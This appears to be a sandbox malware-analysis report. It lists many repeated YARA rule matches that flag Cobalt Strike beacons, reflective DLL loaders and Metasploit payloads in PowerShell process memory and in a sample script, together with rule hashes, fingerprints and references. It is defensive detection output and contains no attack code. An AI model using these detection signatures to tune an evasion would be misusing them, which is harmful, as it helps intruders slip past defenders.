Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0F34 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError, 0_2_0000022EFA0C0F34
Source: 3.ps1, type: SAMPLE Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: amsi64_1900.amsi.csv, type: OTHER Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
